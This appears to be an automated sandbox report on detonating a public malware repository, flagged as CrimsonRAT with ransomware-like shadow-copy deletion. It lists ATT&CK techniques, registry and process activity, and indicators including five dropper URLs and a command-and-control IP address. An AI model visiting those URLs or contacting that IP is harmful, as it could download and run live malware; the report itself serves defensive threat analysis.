crimsonrat | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Analysis

max time kernel
37s
max time network
188s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
29/03/2025, 15:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

crimsonrat defense_evasion discovery execution impact ransomware rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

crimsonrat

185.136.161.124

Signatures

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000600000001c8cb-847.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	1580	powershell.exe	31

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Downloads MZ/PE file 1 IoCs

flow	pid	Process
21	2452	chrome.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
140	raw.githubusercontent.com
141	raw.githubusercontent.com
57	raw.githubusercontent.com
58	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3928	vssadmin.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DAF8FB6-7469-45D9-BD88-756180636BFD}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DAF8FB6-7469-45D9-BD88-756180636BFD}\2.0\0\win32	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{4DAF8FB6-7469-45D9-BD88-756180636BFD}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DAF8FB6-7469-45D9-BD88-756180636BFD}\2.0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1500	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2400	chrome.exe
2400	chrome.exe
2592	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe
Token: SeShutdownPrivilege	2400	chrome.exe

Suspicious use of FindShellTrayWindow 57 IoCs

pid	Process
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
1500	WINWORD.EXE
1500	WINWORD.EXE

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe
2400	chrome.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE
1500	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 2552	2400	chrome.exe	30
PID 2400 wrote to memory of 2552	2400	chrome.exe	30
PID 2400 wrote to memory of 2552	2400	chrome.exe	30
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2772	2400	chrome.exe	32
PID 2400 wrote to memory of 2452	2400	chrome.exe	33
PID 2400 wrote to memory of 2452	2400	chrome.exe	33
PID 2400 wrote to memory of 2452	2400	chrome.exe	33
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34
PID 2400 wrote to memory of 2160	2400	chrome.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6b29758,0x7fef6b29768,0x7fef6b29778
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1372,i,14355263130836659374,8544522497125943417,131072 /prefetch:2
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1372,i,14355263130836659374,8544522497125943417,131072 /prefetch:8
  2⤵
  - Downloads MZ/PE file
  PID:2452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1628 --field-trial-handle=1372,i,14355263130836659374,8544522497125943417,131072 /prefetch:8
  2⤵
  PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1500 --field-trial-handle=1372,i,14355263130836659374,8544522497125943417,131072 /prefetch:1
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1528 --field-trial-handle=1372,i,14355263130836659374,8544522497125943417,131072 /prefetch:1
  2⤵
  PID:2332
- C:\Program Files\Google\Chrome\Application\chrome.exe
